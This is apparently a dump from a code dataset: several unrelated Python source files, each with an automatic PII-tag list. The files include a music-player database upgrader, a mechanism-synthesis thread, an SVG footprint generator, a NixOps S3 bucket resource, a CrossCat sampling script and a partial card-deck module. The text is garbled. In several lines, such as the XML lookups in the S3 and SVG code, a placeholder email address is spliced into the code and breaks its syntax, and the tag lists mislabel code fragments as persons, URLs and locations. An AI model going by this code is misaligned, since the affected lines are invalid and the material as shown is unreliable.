",15015,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'J. Matthew Landis'], ['PERSON', 'api = tweepy'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'user.ni'], ['URL', 'users.cr'], ['URL', 'users.cr'], ['URL', 'os.sy'], ['URL', 'stream.py'], ['URL', 'self.red'], ['URL', 'user.cr'], ['URL', 'self.red'], ['URL', 'users.cr'], ['LOCATION', 'queryData).execute(http'], ['NRP', 'dict_list'], ['LOCATION', 'queryData).execute(http'], ['LOCATION', 'queryData).execute(http'], ['NRP', 'dict_list'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'profile.ht'], ['URL', 'self.red'], ['URL', 'users.cr'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'engine.ht'], ['URL', 'users.cr'], ['URL', 'engine.ht'], ['URL', 'self.red'], ['URL', 'users.cr'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'data.ht'], ['URL', 'users.cr'], ['URL', 'data.ht'], ['URL', 'self.red'], ['URL', 'users.cr'], ['PERSON', 'StreamListener'], ['PERSON', ""RabbitConnection(host='127.0.0.1""], ['PERSON', 'sapi'], ['PERSON', 'Stream(auth'], ['DATE_TIME', 'today'], ['PERSON', 'StreamListener'], ['PERSON', ""RabbitConnection(host='127.0.0.1""], ['PERSON', 'sapi'], ['PERSON', 'Stream(auth'], ['DATE_TIME', 'today'], ['PERSON', 'ProcessUser'], ['URL', 'https://code.google.com/apis/console""'], ['URL', ""https://www.googleapis.com/auth/plus.me',""], ['URL', ""https://www.googleapis.com/auth/bigquery',""], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'email.com'], ['URL', 'haigha.co'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'httplib2.Ht'], ['URL', 'auth.se'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'template.re'], ['URL', 'handler.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'index.ht'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.red'], ['URL', 'users.cr'], ['URL', 'users.ni'], ['URL', 'createProfile.ht'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'self.request.ge'], ['URL', 'self.request.ge'], ['URL', 'fname.re'], ['URL', 'lname.re'], ['URL', 'self.request.ge'], ['URL', 'user.us'], ['URL', 'word.re'], ['URL', 'self.red'], ['URL', 'self.red'], ['URL', 'webapp2.Re'], ['URL', 'decorator.ht'], ['URL', 'self.request.ge'], ['URL', 'samples.sh'], ['URL', 'service.jo'], ['URL', 'row.it'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'webapp2.Re'], ['URL', 'decorator.ht'], ['URL', 'self.request.ge'], ['URL', 'rtda.tw'], ['URL', 'service.jo'], ['URL', 'time.mk'], ['URL', 'status.cr'], ['URL', 'status.ge'], ['URL', 'status.so'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'webapp2.Re'], ['URL', 'decorator.ht'], ['URL', 'self.request.ge'], ['URL', 'rtda.tw'], ['URL', 'service.jo'], ['URL', 'row.it'], ['URL', 'tweet.ge'], ['URL', 'resp.headers.ad'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'self.red'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'user.ni'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'user.ni'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'ndb.Mo'], ['URL', 'ndb.St'], ['URL', 'ndb.St'], ['URL', 'ndb.St'], ['URL', 'ndb.St'], ['URL', 'tweepy.St'], ['URL', 'tweepy.St'], ['URL', 'self.co'], ['URL', 'self.ch'], ['URL', 'self.connection.ch'], ['URL', 'self.channel.queue.de'], ['URL', 'time.mk'], ['URL', 'status.cr'], ['URL', 'status.ge'], ['URL', 'status.so'], ['URL', 'self.channel.ba'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'tweepy.streaming.St'], ['URL', 'sapi.fi'], ['URL', 'self.request.ge'], ['URL', 'tweepy.St'], ['URL', 'tweepy.St'], ['URL', 'self.co'], ['URL', 'self.ch'], ['URL', 'self.connection.ch'], ['URL', 'self.channel.queue.de'], ['URL', 'time.mk'], ['URL', 'status.cr'], ['URL', 'status.ge'], ['URL', 'status.so'], ['URL', 'self.channel.ba'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'tweepy.streaming.St'], ['URL', 'sapi.fi'], ['URL', 'self.request.ge'], ['URL', 'webapp2.WS'], ['URL', 'decorator.ca'], ['URL', 'decorator.ca'], ['URL', 'decorator.ca'], ['URL', 'decorator.ca']]"
46,"#!/usr/bin/python
# Copyright (c) 2014-2015 Cedric Bellegarde dummy@email.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
from lollypop.sqlcursor import SqlCursor
class DatabaseUpgrade:
""""""
Manage database schema upgrades
""""""
def __init__(self, version, db):
""""""
Init object
@param version as int
@param db as Database
""""""
self._version = version
self._db = db
# Here are schema upgrade, key is database version,
# value is sql request
self._UPGRADES = {
1: ""update tracks set duration=CAST(duration as INTEGER);"",
2: ""update albums set artist_id=-2001 where artist_id=-999;""
}
""""""
Return upgrade count
@return int
""""""
def count(self):
return len(self._UPGRADES)
""""""
Upgrade database based on version
@return new db version as int
""""""
def do_db_upgrade(self):
with SqlCursor(self._db) as sql:
for i in range(self._version+1, len(self._UPGRADES)+1):
try:
sql.execute(self._UPGRADES[i])
except Exception as e:
print(""Database upgrade failed: "", e)
sql.commit()
return len(self._UPGRADES)
",1917,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014-2015'], ['PERSON', 'Cedric Bellegarde'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'sql.com']]"
47,"# -*- coding: utf-8 -*-
""""""Thread of structural synthesis.""""""
__author__ = ""Yuan Chang""
__copyright__ = ""Copyright (C) 2016-2021""
__license__ = ""AGPL""
__email__ = dummy@email.com""
from typing import Sequence, Dict, List
from qtpy.QtCore import Signal
from qtpy.QtWidgets import QWidget, QTreeWidgetItem
from pyslvs.graph import (
link_synthesis,
contracted_link_synthesis,
contracted_graph,
conventional_graph,
Graph,
)
from pyslvs_ui.synthesis.thread import BaseThread
Assortment = Sequence[int]
def assortment_eval(links_expr: str) -> Assortment:
""""""Return link assortment from expr.""""""
return tuple(int(n.split('=')[-1]) for n in links_expr.split("", ""))
class LinkThread(BaseThread):
""""""Link assortment synthesis thread.""""""
progress_update = Signal(int)
result = Signal(dict)
size_update = Signal(int)
def __init__(self, nl: int, nj: int, parent: QWidget):
super(LinkThread, self).__init__(parent)
self.nl = nl
self.nj = nj
def run(self) -> None:
""""""Run and return contracted link assortment.""""""
try:
la_list = link_synthesis(self.nl, self.nj, lambda: self.is_stop)
except ValueError:
self.progress_update.emit(1)
self.result.emit({})
self.finished.emit()
return
self.size_update.emit(len(la_list))
assortment = {}
for i, la in enumerate(la_list):
if self.is_stop:
break
assortment[la] = contracted_link_synthesis(la, lambda: self.is_stop)
self.progress_update.emit(1 + i)
self.result.emit(assortment)
self.finished.emit()
class GraphThread(BaseThread):
""""""Graphs enumeration thread.""""""
progress_update = Signal(int)
count_update = Signal(QTreeWidgetItem, int)
result = Signal(list)
def __init__(self, jobs: Sequence[QTreeWidgetItem], degenerate: int, parent: QWidget):
super(GraphThread, self).__init__(parent)
self.jobs = jobs
self.degenerate = degenerate
def run(self) -> None:
""""""Run and return conventional graph.""""""
cg_list: Dict[Sequence[int], List[Graph]] = {}
answers = []
for i, item in enumerate(self.jobs):
if self.is_stop:
break
root = item.parent()
la = assortment_eval(root.text(0))
cla = assortment_eval(item.text(0))
if la not in cg_list:
cg_list[la] = contracted_graph(la, lambda: self.is_stop)
answer = conventional_graph(
cg_list[la],
cla,
self.degenerate,
lambda: self.is_stop
)
self.count_update.emit(item, len(answer))
answers.extend(answer)
self.progress_update.emit(1 + i)
self.result.emit(answers)
self.finished.emit()
",2931,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Yuan Chang'], ['DATE_TIME', '2016-2021'], ['PERSON', 'QtCore'], ['URL', 'self.nl'], ['URL', 'self.nl'], ['URL', 'self.is'], ['URL', 'self.is'], ['URL', 'self.pro'], ['PERSON', 'Sequence[QTreeWidgetItem'], ['URL', 'email.com'], ['URL', 'pyslvs.gr'], ['URL', 'ui.synthesis.th'], ['URL', 'self.pro'], ['URL', 'self.re'], ['URL', 'self.fi'], ['URL', 'self.si'], ['URL', 'self.is'], ['URL', 'self.re'], ['URL', 'self.fi'], ['URL', 'self.jo'], ['URL', 'self.de'], ['URL', 'self.jo'], ['URL', 'self.is'], ['URL', 'item.pa'], ['URL', 'self.is'], ['URL', 'self.de'], ['URL', 'self.is'], ['URL', 'self.co'], ['URL', 'self.pro'], ['URL', 'self.re'], ['URL', 'self.fi']]"
48,"#!/usr/bin/env python3
import xml.etree.ElementTree as ET
def get_target():
return SVG()
class SVG:
def __init__(self):
self.svg = ET.parse('skeleton.svg')
self.mmpx = 3.543307
def output(self, path):
self.svg.write(path)
def add_package(self, package):
'''
Target SVG only handles one drawing at a time, only last added drawing will be part of output
'''
self.svg = ET.parse('skeleton.svg')
self.package = \
{
'name': package['name'],
'pads': [],
'mnt_pads': [],
'holes': [],
'lines': [],
'circles': [],
'rectangles': [] ,
'texts': []
}
def output(self, fout):
package = self.package
for pad in package['pads']:
self.gen_pac_pad(pad)
for mnt_pad in package['mnt_pads']: # TODO, adding mnt_pads not done
self.gen_pac_mnt_pad(mnt_pad)
for hole in package['holes']:
self.gen_pac_hole(hole)
for line in package['lines']:
self.gen_pac_line(line)
if(0):
for circle in package['circles']:
self.gen_pac_circle(circle)
for rect in package['rectangles']:
self.gen_pac_rectangle(rect)
for text in package['texts']:
self.gen_pac_text(text)
self.svg.write(fout)
def add_pac_pad(self, type, angle, size, pos, number):
self.package['pads'].append(
{
'type': type,
'angle': angle,
'size': size,
'pos': pos,
'number': number
})
def add_pac_hole(self, diameter, pos):
self.package['holes'].append(
{
'd': diameter,
'pos': pos
})
def add_pac_line(self, layer, width, vertices):
self.package['lines'].append(
{
'layer': layer,
'width': width,
'vertices': vertices
})
def gen_pac_pad(self, pad): # type, angle, size, pos, number
top_layer = self.svg.find('.//g[@id=""Top""]')
# TODO: Types and angle
el = ET.SubElement(top_layer, 'rect')
el.set('style', 'fill:#ff0000;fill-opacity:1;stroke:none;stroke-width:10;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1')
el.set('id', 'pin_{}'.format(pad['number']))
el.set('width', '{}'.format(pad['size'][0]*self.mmpx))
el.set('height', '{}'.format(pad['size'][1]*self.mmpx))
el.set('x', '{}'.format((pad['pos'][0] - pad['size'][0]/2)*self.mmpx))
el.set('y', '{}'.format((pad['pos'][1] - pad['size'][1]/2)*self.mmpx))
def gen_pac_hole(self, hole):
top_layer = self.svg.find('.//g[@id=""Holes""]')
circle = ET.SubElement(top_layer, 'circle')
circle.set('style', 'fill:#eeee00;fill-opacity:1;stroke:none;stroke-width:0.0;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1""')
circle.set('cx', '{}'.format(hole['pos'][0]*self.mmpx))
circle.set('cy', '{}'.format(hole['pos'][1]*self.mmpx))
circle.set('r', '{}'.format(hole['d']/2*self.mmpx))
def gen_pac_line(self, line):
layer = self.svg.find(dummy@email.com(line['layer']))
if(line['layer'] == 'Courtyard'):
color = '#e63a81'
elif(line['layer'] == 'Silk'):
color = '#111111'
else:
color = '#000000'
el = ET.SubElement(layer, 'path')
el.set('style', 'fill:none;fill-rule:evenodd;stroke:{color};stroke-width:{}mm;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;stroke-miterlimit:4;stroke-dasharray:none'.format(line['width'], color=color))
pathdata = ''
first = True
for (x,y) in line['vertices']:
if(first):
pathdata += 'M ' + '{},{}'.format(x*self.mmpx,y*self.mmpx)
first = False
elif(x == 'end'):
pathdata += ' z'
else:
pathdata += ' L ' + '{},{}'.format(x*self.mmpx,y*self.mmpx)
el.set('d', pathdata)
def gen_circle(self, layer_name, diameter, pos):
layer = self.svg.find(dummy@email.com(layer_name))
if(layer_name == 'Courtyard'):
color = '#e63a81'
elif(layer_name == 'Silk'):
color = '#111111'
else:
color = '#000000'
circle = ET.SubElement(layer, 'circle')
circle.set('style', 'fill:#{color};fill-opacity:1;stroke:none;stroke-width:0.0;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1""'.format(color=color))
circle.set('cx', '{}'.format(pos[0]*self.mmpx))
circle.set('cy', '{}'.format(pos[1]*self.mmpx))
circle.set('r', '{}'.format(diameter/2*self.mmpx))
if(__name__ == '__main__'):
target = get_target()
target.output('test.svg')
",4250,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'fout'], ['LOCATION', ""package['holes""], ['PERSON', 'pos\n\t\t\t}'], ['PERSON', 'top_layer = self.svg.find(\'.//g[@id=""Top'], ['PERSON', 'TODO'], ['PERSON', ""el.set('style""], ['PERSON', ""el.set('height""], ['PERSON', ""circle.set('cx""], ['PERSON', ""circle.set('r""], ['LOCATION', '000000'], ['PERSON', ""el.set('style""], ['NRP', '000000'], ['PERSON', ""circle.set('cx""], ['PERSON', ""circle.set('r""], ['URL', 'xml.et'], ['URL', 'self.sv'], ['URL', 'ET.pa'], ['URL', 'skeleton.sv'], ['URL', 'self.mm'], ['URL', 'self.sv'], ['URL', 'self.sv'], ['URL', 'ET.pa'], ['URL', 'skeleton.sv'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.sv'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'self.svg.fi'], ['URL', 'ET.Su'], ['URL', 'el.se'], ['URL', 'el.se'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'self.svg.fi'], ['URL', 'ET.Su'], ['URL', 'circle.se'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'self.svg.fi'], ['URL', 'email.com'], ['URL', 'ET.Su'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'self.mm'], ['URL', 'self.mm'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.svg.fi'], ['URL', 'email.com'], ['URL', 'ET.Su'], ['URL', 'circle.se'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'test.sv']]"
49,"# -*- coding: utf-8 -*-
# Automatic provisioning of AWS S3 buckets.
import time
import botocore
import boto3
import nixops.util
import nixops.resources
import nixops.ec2_utils
class S3BucketDefinition(nixops.resources.ResourceDefinition):
""""""Definition of an S3 bucket.""""""
@classmethod
def get_type(cls):
return ""s3-bucket""
@classmethod
def get_resource_type(cls):
return ""s3Buckets""
def __init__(self, xml, config={}):
nixops.resources.ResourceDefinition.__init__(self, xml, config)
self.bucket_name = xml.find(dummy@email.com(""value"")
self.region = xml.find(dummy@email.com(""value"")
self.access_key_id = xml.find(dummy@email.com(""value"")
self.policy = xml.find(dummy@email.com(""value"")
self.website_enabled = self.config[""website""][""enabled""]
self.website_suffix = self.config[""website""][""suffix""]
self.website_error_document = self.config[""website""][""errorDocument""]
def show_type(self):
return ""{0} [{1}]"".format(self.get_type(), self.region)
class S3BucketState(nixops.resources.ResourceState):
""""""State of an S3 bucket.""""""
state = nixops.util.attr_property(""state"", nixops.resources.ResourceState.MISSING, int)
bucket_name = nixops.util.attr_property(""ec2.bucketName"", None)
access_key_id = nixops.util.attr_property(""ec2.accessKeyId"", None)
region = nixops.util.attr_property(""ec2.region"", None)
@classmethod
def get_type(cls):
return ""s3-bucket""
def __init__(self, depl, name, id):
nixops.resources.ResourceState.__init__(self, depl, name, id)
self._conn = None
def show_type(self):
s = super(S3BucketState, self).show_type()
if self.region: s = ""{0} [{1}]"".format(s, self.region)
return s
@property
def resource_id(self):
return self.bucket_name
def get_definition_prefix(self):
return ""resources.s3Buckets.""
def connect(self):
if self._conn: return
(access_key_id, secret_access_key) = nixops.ec2_utils.fetch_aws_secret_key(self.access_key_id)
self._conn = boto3.session.Session(region_name=self.region if self.region != ""US"" else ""us-east-1"",
aws_access_key_id=access_key_id,
aws_secret_access_key=secret_access_key)
def create(self, defn, check, allow_reboot, allow_recreate):
self.access_key_id = defn.access_key_id or nixops.ec2_utils.get_access_key_id()
if not self.access_key_id:
raise Exception(""please set ‘accessKeyId’, $EC2_ACCESS_KEY or $AWS_ACCESS_KEY_ID"")
if len(defn.bucket_name) > 63:
raise Exception(""bucket name ‘{0}’ is longer than 63 characters."".format(defn.bucket_name))
self.connect()
s3client = self._conn.client('s3')
if check or self.state != self.UP:
self.log(""creating S3 bucket ‘{0}’..."".format(defn.bucket_name))
try:
ACL = 'private' # ..or: public-read, public-read-write, authenticated-read
s3loc = region_to_s3_location(defn.region)
if s3loc == ""US"":
s3client.create_bucket(ACL = ACL,
Bucket = defn.bucket_name)
else:
s3client.create_bucket(ACL = ACL,
Bucket = defn.bucket_name,
CreateBucketConfiguration = {
'LocationConstraint': s3loc
})
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != ""BucketAlreadyOwnedByYou"": raise
with self.depl._db:
self.state = self.UP
self.bucket_name = defn.bucket_name
self.region = defn.region
if defn.policy:
self.log(""setting S3 bucket policy on ‘{0}’..."".format(defn.bucket_name))
s3client.put_bucket_policy(Bucket = defn.bucket_name,
Policy = defn.policy.strip())
else:
try:
s3client.delete_bucket_policy(Bucket = defn.bucket_name)
except botocore.exceptions.ClientError as e:
# This seems not to happen - despite docs indicating it should:
# [http://docs.aws.amazon.com/AmazonS3/latest/API/RESTBucketDELETEpolicy.html]
if e.response['ResponseMetadata']['HTTPStatusCode'] != 204: raise # (204 : Bucket didn't have any policy to delete)
if not defn.website_enabled:
try:
s3client.delete_bucket_website(Bucket = defn.bucket_name)
except botocore.exceptions.ClientError as e:
if e.response['ResponseMetadata']['HTTPStatusCode'] != 204: raise
else:
website_config = { 'IndexDocument': { 'Suffix': defn.website_suffix } }
if defn.website_error_document != """":
website_config['ErrorDocument'] = { 'Key': defn.website_error_document}
s3client.put_bucket_website(Bucket = defn.bucket_name, WebsiteConfiguration = website_config)
def destroy(self, wipe=False):
if self.state == self.UP:
self.connect()
try:
self.log(""destroying S3 bucket ‘{0}’..."".format(self.bucket_name))
bucket = self._conn.resource('s3').Bucket(self.bucket_name)
try:
bucket.delete()
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != ""BucketNotEmpty"": raise
if not self.depl.logger.confirm(""are you sure you want to destroy S3 bucket ‘{0}’?"".format(self.bucket_name)): return False
bucket.objects.all().delete()
bucket.delete()
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != ""NoSuchBucket"": raise
return True
def region_to_s3_location(region):
# S3 location names are identical to EC2 regions, except for
# us-east-1 and eu-west-1.
if region == ""eu-west-1"": return ""EU""
elif region == ""us-east-1"": return ""US""
else: return region
",6394,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['NRP', 'S3'], ['LOCATION', 'config='], ['PERSON', 'self.access_key_id = xml.find(dummy@email.com(""value'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.co'], ['LOCATION', 'US'], ['LOCATION', 'defn'], ['LOCATION', 'US'], ['URL', 's3client.de'], ['URL', 'botocore.exceptions.Cl'], ['LOCATION', 'US'], ['US_DRIVER_LICENSE', 'S3'], ['URL', 'http://docs.aws.amazon.com/AmazonS3/latest/API/RESTBucketDELETEpolicy.html]'], ['URL', 'nixops.re'], ['URL', 'nixops.ec'], ['URL', 'nixops.resources.Re'], ['URL', 'nixops.resources.Re'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'self.re'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'self.ac'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'self.ge'], ['URL', 'self.re'], ['URL', 'nixops.resources.Re'], ['URL', 'nixops.util.at'], ['URL', 'nixops.resources.Re'], ['URL', 'nixops.util.at'], ['URL', 'nixops.util.at'], ['URL', 'ec2.ac'], ['URL', 'nixops.util.at'], ['URL', 'ec2.re'], ['URL', 'nixops.resources.Re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'nixops.ec'], ['URL', 'self.ac'], ['URL', 'boto3.session.Se'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.ac'], ['URL', 'defn.ac'], ['URL', 'nixops.ec'], ['URL', 'utils.ge'], ['URL', 'self.ac'], ['URL', 'self.co'], ['URL', 'conn.cl'], ['URL', 'self.st'], ['URL', 'defn.re'], ['URL', 's3client.cr'], ['URL', 's3client.cr'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re'], ['URL', 'self.de'], ['URL', 'self.st'], ['URL', 'self.re'], ['URL', 'defn.re'], ['URL', 'defn.policy.st'], ['URL', 's3client.de'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re'], ['URL', 'e.re'], ['URL', 'self.st'], ['URL', 'self.co'], ['URL', 'conn.re'], ['URL', 'bucket.de'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re'], ['URL', 'self.depl.logger.co'], ['URL', 'bucket.objects.al'], ['URL', 'bucket.de'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re']]"
50,"#
# Copyright (c) 2010-2014, MIT Probabilistic Computing Project
#
# Lead Developers: Dan Lovell and Jay Baxter
# Authors: Dan Lovell, Baxter Eaves, Jay Baxter, Vikash Mansinghka
# Research Leads: Vikash Mansinghka, Patrick Shafto
#
# Licensed under the Apache License, Version 2.0 (the ""License"");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an ""AS IS"" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import sys
from collections import Counter
#
import numpy
import pylab
pylab.ion()
pylab.show()
#
import crosscat.tests.plot_utils as pu
import crosscat.utils.file_utils as fu
import crosscat.utils.sample_utils as su
import crosscat.utils.api_utils as au
# parse some arguments
parser = argparse.ArgumentParser()
parser.add_argument('pkl_name', type=str)
parser.add_argument('--inf_seed', default=0, type=int)
parser.add_argument('--hostname', default='127.0.0.1', type=str)
args = parser.parse_args()
pkl_name = args.pkl_name
inf_seed = args.inf_seed
hostname = args.hostname
# FIXME: getting weird error on conversion to int: too large from inside pyx
def get_next_seed(max_val=32767): # sys.maxint):
return random_state.randint(max_val)
# resume from saved name
save_dict = fu.unpickle(pkl_name)
random_state = numpy.random.RandomState(inf_seed)
M_c = save_dict['M_c']
X_L = save_dict['X_L']
X_D = save_dict['X_D']
# FIXME: test constraints
# Y = [su.Bunch(index=2,value=2.3), su.Bunch(index=0,value=-4.)]
Y = None
# test simple_predictive_sample_observed
views_replicating_samples_params = su.determine_replicating_samples_params(X_L, X_D)
views_samples = []
for replicating_samples_params in views_replicating_samples_params:
this_view_samples = []
for replicating_sample_params in replicating_samples_params:
this_view_this_sample = su.simple_predictive_sample(
M_c, X_L, X_D, get_next_seed=get_next_seed, **replicating_sample_params)
this_view_samples.extend(this_view_this_sample)
views_samples.append(this_view_samples)
for view_idx, view_samples in enumerate(views_samples):
data_array = numpy.array(view_samples)
pu.plot_T(data_array)
pylab.title('simple_predictive_sample observed, view %s on local' % view_idx)
# test simple_predictive_sample_observed REMOTE
# hostname = 'ec2-23-22-208-4.compute-1.amazonaws.com'
URI = 'http://' + hostname + ':8007'
method_name = 'simple_predictive_sample'
#
views_samples = []
for replicating_samples_params in views_replicating_samples_params:
this_view_samples = []
for replicating_sample_params in replicating_samples_params:
args_dict = dict(
M_c=save_dict['M_c'],
X_L=save_dict['X_L'],
X_D=save_dict['X_D'],
Y=replicating_sample_params['Y'],
Q=replicating_sample_params['Q'],
n=replicating_sample_params['n'],
)
this_view_this_sample, id = au.call(
method_name, args_dict, URI)
print id
this_view_samples.extend(this_view_this_sample)
views_samples.append(this_view_samples)
for view_idx, view_samples in enumerate(views_samples):
data_array = numpy.array(view_samples)
pu.plot_T(data_array)
pylab.title('simple_predictive_sample observed, view %s on remote' % view_idx)
# test simple_predictive_sample_unobserved
observed_Q = views_replicating_samples_params[0][0]['Q']
Q = [(int(1E6), old_tuple[1]) for old_tuple in observed_Q]
new_row_samples = []
new_row_sample = su.simple_predictive_sample(
M_c, X_L, X_D, Y, Q, get_next_seed, n=1000)
new_row_samples.extend(new_row_sample)
new_row_samples = numpy.array(new_row_samples)
pu.plot_T(new_row_samples)
# once more with constraint
Y = [(int(1E6), 0, 100)]
new_row_sample = su.simple_predictive_sample(
M_c, X_L, X_D, Y, Q, get_next_seed, n=1)
# test impute
# imputed_value = su.impute(M_c, X_L, X_D, Y, [Q[3]], 100, get_next_seed)
",4283,"[['DATE_TIME', '2010-2014'], ['PERSON', 'Dan Lovell'], ['PERSON', 'Jay Baxter'], ['PERSON', 'Dan Lovell'], ['PERSON', 'Baxter Eaves'], ['PERSON', 'Jay Baxter'], ['PERSON', 'Vikash Mansinghka'], ['PERSON', 'Patrick Shafto'], ['LOCATION', 'crosscat.utils.sample_utils'], ['LOCATION', 'au'], ['PERSON', ""default='127.0.0.1""], ['PERSON', 'save_dict = fu.unpickle(pkl_name'], ['LOCATION', 'M_c'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['PERSON', 'new_row_samples'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'pylab.io'], ['URL', 'pylab.sh'], ['URL', 'crosscat.tests.pl'], ['URL', 'crosscat.utils.fi'], ['URL', 'crosscat.utils.sa'], ['URL', 'argparse.Ar'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['URL', 'args.pk'], ['URL', 'args.in'], ['URL', 'sys.ma'], ['URL', 'su.de'], ['URL', 'su.si'], ['URL', 'numpy.ar'], ['URL', 'pu.pl'], ['URL', 'ec2-23-22-208-4.compute-1.amazonaws.com'], ['URL', 'au.ca'], ['URL', 'numpy.ar'], ['URL', 'pu.pl'], ['URL', 'su.si'], ['URL', 'numpy.ar'], ['URL', 'pu.pl'], ['URL', 'su.si'], ['URL', 'su.im']]"
51,"# -*- coding: utf-8 -*-
""""""
.. module:: deck
:synopsis: Encapsulates the behavior of card collections
.. moduleauthor:: Zach Mitchell dummy@email.com
""""""
from random import shuffle
from typing import List
from .cards import (
Card,
CardFaction,
CardEffect,
CardAction,
CardTarget
)
from .cardrepo import CardRepo
from .exceptions import (
RealmsException,
MainDeckEmpty,
PlayerDeckEmpty,
PlayerDeckInitSize,
PlayerDeckInitContents,
UUIDNotFoundError,
HandInitError
)
from collections import Counter
from typing import NamedTuple
CardList = List[Card]
EffectList = List[CardEffect]
FactionList = List[CardFaction]
EffectRecord = NamedTuple('EffectRecord', [
('target', CardTarget),
('action', CardAction),
('value', int),
('uuid', str),
('provider', str)])
class PlayerDeck(object):
""""""
Records the state of the player's deck
At any given point in time the player may have three piles of cards: undrawn cards, a
hand of cards, and a pile of used (discarded) cards. PlayerDeck records which cards are
in which pile, provides an interface from which a hand of cards can be assembled, and
shuffles the deck when necessary.
Parameters
----------
player_cards : List[Card]
The list of cards from which the player's starting deck will be constructed
Raises
------
PlayerDeckInitSize
Raised when constructing the deck with the wrong number of cards
PlayerDeckInitContents
Raised when constructing the deck with cards other than Vipers and Scouts
""""""
starting_size = 10
def __init__(self, player_cards: CardList):
try:
self._validate_deck_size(player_cards)
self._validate_deck_contents(player_cards)
except RealmsException:
raise
